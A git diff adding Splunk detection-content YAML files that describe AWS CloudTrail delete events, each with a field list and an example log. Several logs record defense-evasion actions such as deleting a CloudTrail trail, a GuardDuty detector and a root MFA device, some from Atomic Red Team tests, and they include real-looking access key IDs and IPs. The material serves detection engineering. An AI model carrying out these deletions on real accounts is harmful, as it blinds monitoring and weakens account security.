+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli",
+  "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName":
+  "gowthamaraj_cli"}, "eventTime": "2022-07-21T20:27:54Z", "eventSource": "guardduty.amazonaws.com",
+  "eventName": "DeleteDetector", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185",
+  "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off
+  command/guardduty.delete-detector", "errorCode": "BadRequestException", "requestParameters":
+  {"detectorId": "123"}, "responseElements": {"message": "The request is rejected
+  because the parameter detectorId has an invalid value.", "__type": "InvalidInputException"},
+  "requestID": "1e832076-d7a8-432b-b0df-54ba62f6b62c", "eventID": "c1367a2f-8910-4e64-9256-a854d2e9f37d",
+  "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/aws_cloudtrail_deletegroup.yml b/data_sources/aws_cloudtrail_deletegroup.yml
new file mode 100644
index 0000000000..f9e225a9b4
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletegroup.yml
@@ -0,0 +1,102 @@
+name: AWS CloudTrail DeleteGroup
+id: c95308a4-a943-42ca-b112-f90a05c21bd3
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteGroup
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- errorMessage
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- reason
+- recipientAccountId
+- region
+- requestID
+- requestParameters.groupName
+- responseElements
+- result
+- result_id
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::121522247101:user/bhavin_cli", "accountId":
+  "121522247101", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"},
+  "eventTime": "2021-04-07T00:17:50Z", "eventSource": "iam.amazonaws.com", "eventName":
+  "DeleteGroup", "awsRegion": "us-east-1", "sourceIPAddress": "12.12.12.20", "userAgent":
+  "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.delete-group",
+  "errorCode": "NoSuchEntityException", "errorMessage": "The group with name AtomicRedTeam_Victim
+  cannot be found.", "requestParameters": {"groupName": "AtomicRedTeam_Victim"}, "responseElements":
+  null, "requestID": "15684d3b-a8c5-4334-a996-16619e901c17", "eventID": "ab65dca3-3d28-41f4-9f99-443606cc49fe",
+  "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory":
+  "Management", "recipientAccountId": "121522247101"}'
diff --git a/data_sources/aws_cloudtrail_deleteipset.yml b/data_sources/aws_cloudtrail_deleteipset.yml
new file mode 100644
index 0000000000..78c912c368
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deleteipset.yml
@@ -0,0 +1,99 @@
+name: AWS CloudTrail DeleteIPSet
+id: ebdeeb63-77a0-4808-a6fe-549956731377
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteIPSet
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.detectorId
+- requestParameters.ipSetId
+- responseElements.__type
+- responseElements.message
+- result_id
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId":
+  "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"},
+  "eventTime": "2022-07-26T23:14:57Z", "eventSource": "guardduty.amazonaws.com", "eventName":
+  "DeleteIPSet", "awsRegion": "us-west-2", "sourceIPAddress": "142.254.89.27", "userAgent":
+  "aws-cli/2.0.62 Python/3.9.2 Darwin/21.5.0 source/x86_64 command/guardduty.delete-ip-set",
+  "errorCode": "BadRequestException", "requestParameters": {"detectorId": "11111",
+  "ipSetId": "1111"}, "responseElements": {"message": "The request is rejected because
+  the parameter detectorId has an invalid value.", "__type": "InvalidInputException"},
+  "requestID": "70d36916-4ce7-4b6e-9226-9da47d58d554", "eventID": "884dc529-d98f-4529-bfa1-8cdd6c06d02f",
+  "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/aws_cloudtrail_deleteloggroup.yml b/data_sources/aws_cloudtrail_deleteloggroup.yml
new file mode 100644
index 0000000000..f8325f0e05
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deleteloggroup.yml
@@ -0,0 +1,100 @@
+name: AWS CloudTrail DeleteLogGroup
+id: 60cf6a69-fa43-4a6c-8808-e9fb46bf387f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteLogGroup
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- apiVersion
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.logGroupName
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli",
+  "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName":
+  "gowthamaraj_cli"}, "eventTime": "2022-07-19T08:58:48Z", "eventSource": "logs.amazonaws.com",
+  "eventName": "DeleteLogGroup", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185",
+  "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off
+  command/logs.delete-log-group", "requestParameters": {"logGroupName": "test-logs"},
+  "responseElements": null, "requestID": "76089b03-d749-4f83-bc0e-b857c83bba5f", "eventID":
+  "5aba96c4-e7f9-4e4f-b5e6-49694162195d", "readOnly": false, "eventType": "AwsApiCall",
+  "apiVersion": "20140328", "managementEvent": true, "recipientAccountId": "111111111111",
+  "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite":
+  "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "logs.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_deletelogstream.yml b/data_sources/aws_cloudtrail_deletelogstream.yml
new file mode 100644
index 0000000000..693f606fd2
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletelogstream.yml
@@ -0,0 +1,101 @@
+name: AWS CloudTrail DeleteLogStream
+id: 6f8bb808-89f8-465e-a34d-229df2f46402
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteLogStream
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- apiVersion
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.logGroupName
+- requestParameters.logStreamName
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli",
+  "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName":
+  "gowthamaraj_cli"}, "eventTime": "2022-07-20T21:09:51Z", "eventSource": "logs.amazonaws.com",
+  "eventName": "DeleteLogStream", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185",
+  "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off
+  command/logs.delete-log-stream", "requestParameters": {"logGroupName": "test-logs",
+  "logStreamName": "20150601"}, "responseElements": null, "requestID": "2d7e859e-d697-426f-8b56-c4c11c4055f3",
+  "eventID": "561c3f4e-17ca-4438-b15d-29903baf7b13", "readOnly": false, "eventType":
+  "AwsApiCall", "apiVersion": "20140328", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+  "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "logs.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_deletenetworkaclentry.yml b/data_sources/aws_cloudtrail_deletenetworkaclentry.yml
new file mode 100644
index 0000000000..87aa8f17ff
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletenetworkaclentry.yml
@@ -0,0 +1,110 @@
+name: AWS CloudTrail DeleteNetworkAclEntry
+id: a0dd0f10-cc03-425d-bd5a-e1e0d954b856
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteNetworkAclEntry
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- direction
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.egress
+- requestParameters.networkAclId
+- requestParameters.ruleNumber
+- responseElements._return
+- responseElements.requestId
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+  "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local",
+  "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLF3F7BXZK", "sessionContext":
+  {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn":
+  "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName":
+  "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated":
+  "false", "creationDate": "2021-01-12T08:36:15Z"}}}, "eventTime": "2021-01-12T09:26:26Z",
+  "eventSource": "ec2.amazonaws.com", "eventName": "DeleteNetworkAclEntry", "awsRegion":
+  "eu-central-1", "sourceIPAddress": "95.90.199.65", "userAgent": "console.ec2.amazonaws.com",
+  "requestParameters": {"networkAclId": "acl-078ccebebcbabe175", "ruleNumber": 40,
+  "egress": false}, "responseElements": {"requestId": "607474bb-836b-46be-be4a-351ebbef67d6",
+  "_return": true}, "requestID": "607474bb-836b-46be-be4a-351ebbef67d6", "eventID":
+  "b9e05770-e9b0-4ba1-91e8-6537097e06e7", "readOnly": false, "eventType": "AwsApiCall",
+  "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_deletepolicy.yml b/data_sources/aws_cloudtrail_deletepolicy.yml
new file mode 100644
index 0000000000..0c47f50789
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletepolicy.yml
@@ -0,0 +1,102 @@
+name: AWS CloudTrail DeletePolicy
+id: d190d23a-2c59-4a0e-9c55-a53ebef28ee5
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeletePolicy
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- errorMessage
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- reason
+- recipientAccountId
+- region
+- requestID
+- requestParameters.policyArn
+- responseElements
+- result
+- result_id
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::151521547504:user/bhavin_cli", "accountId":
+  "151521547504", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"},
+  "eventTime": "2021-04-02T18:01:00Z", "eventSource": "iam.amazonaws.com", "eventName":
+  "DeletePolicy", "awsRegion": "us-east-1", "sourceIPAddress": "61.25.42.212", "userAgent":
+  "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.delete-policy",
+  "errorCode": "NoSuchEntityException", "errorMessage": "Policy arn:aws:iam::151521547504:policy/AtomicRedTeam
+  was not found.", "requestParameters": {"policyArn": "arn:aws:iam::151521547504:policy/AtomicRedTeam"},
+  "responseElements": null, "requestID": "90cbe52f-e744-4bba-9f5c-1843c9ca1855", "eventID":
+  "abd071bf-0a38-4fab-af4a-5eee55f0935e", "readOnly": false, "eventType": "AwsApiCall",
+  "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "151521547504"}'
diff --git a/data_sources/aws_cloudtrail_deleterule.yml b/data_sources/aws_cloudtrail_deleterule.yml
new file mode 100644
index 0000000000..e7bae91f05
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deleterule.yml
@@ -0,0 +1,102 @@
+name: AWS CloudTrail DeleteRule
+id: b5760623-f3ca-492d-a372-d5c2b3567dfc
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteRule
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- apiVersion
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.changeToken
+- requestParameters.ruleId
+- responseElements.changeToken
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli",
+  "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName":
+  "gowthamaraj_cli"}, "eventTime": "2022-07-20T21:40:42Z", "eventSource": "waf.amazonaws.com",
+  "eventName": "DeleteRule", "awsRegion": "us-east-1", "sourceIPAddress": "67.171.71.185",
+  "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off
+  command/waf.delete-rule", "requestParameters": {"changeToken": "c5daf4cb-68e1-425f-b52d-49a32a7f187f",
+  "ruleId": "5a9b1c4a-a999-4bb2-9f51-555f086ff34f"}, "responseElements": {"changeToken":
+  "c5daf4cb-68e1-425f-b52d-49a32a7f187f"}, "requestID": "2089be3e-28ea-4349-b505-db72c81c272a",
+  "eventID": "0f815483-f6bb-42d9-b870-0dcc64ddc9a4", "readOnly": false, "eventType":
+  "AwsApiCall", "apiVersion": "2015-08-24", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+  "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "waf.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_deletetrail.yml b/data_sources/aws_cloudtrail_deletetrail.yml
new file mode 100644
index 0000000000..5c3bcc1690
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletetrail.yml
@@ -0,0 +1,98 @@
+name: AWS CloudTrail DeleteTrail
+id: a5af09ff-07b6-4df6-92a0-2146bfe402c8
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteTrail
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.name
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId":
+  "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"},
+  "eventTime": "2022-07-13T19:03:51Z", "eventSource": "cloudtrail.amazonaws.com",
+  "eventName": "DeleteTrail", "awsRegion": "us-west-2", "sourceIPAddress": "192.184.242.57",
+  "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/21.5.0 source/x86_64 command/cloudtrail.delete-trail",
+  "requestParameters": {"name": "redatomictesttrail"}, "responseElements": null, "requestID":
+  "2ba0af54-1451-4a2c-846e-18436bcee01e", "eventID": "1c53bcce-650d-486a-b3f6-f64fd853e509",
+  "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+  "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "cloudtrail.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_deletevirtualmfadevice.yml b/data_sources/aws_cloudtrail_deletevirtualmfadevice.yml
new file mode 100644
index 0000000000..87d90da25f
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletevirtualmfadevice.yml
@@ -0,0 +1,100 @@
+name: AWS CloudTrail DeleteVirtualMFADevice
+id: 84a08d6b-3d59-4260-8cab-84278ada262f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteVirtualMFADevice
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.serialNumber
+- responseElements
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId":
+  "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111",
+  "accessKeyId": "ASIASBMSCQHHWAIHMHUX", "sessionContext": {"sessionIssuer": {}, "webIdFederationData":
+  {}, "attributes": {"creationDate": "2022-10-04T16:13:23Z", "mfaAuthenticated": "true"}}},
+  "eventTime": "2022-10-04T16:13:46Z", "eventSource": "iam.amazonaws.com", "eventName":
+  "DeleteVirtualMFADevice", "awsRegion": "us-east-1", "sourceIPAddress": "AWS Internal",
+  "userAgent": "AWS Internal", "requestParameters": {"serialNumber": "arn:aws:iam::111111111111:mfa/root-account-mfa-device"},
+  "responseElements": null, "requestID": "5f192b01-d59d-4cee-8880-cc5cc6fd9b43", "eventID":
+  "01f0258f-b83f-4c0f-8fd3-380473840db8", "readOnly": false, "eventType": "AwsApiCall",
+  "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory":
+  "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/aws_cloudtrail_deletewebacl.yml b/data_sources/aws_cloudtrail_deletewebacl.yml
new file mode 100644
index 0000000000..1c1ed0c711
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletewebacl.yml
@@ -0,0 +1,102 @@
+name: AWS CloudTrail DeleteWebACL
+id: 90da5f08-7961-4c29-8de8-01364982aadf
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteWebACL
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- apiVersion
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
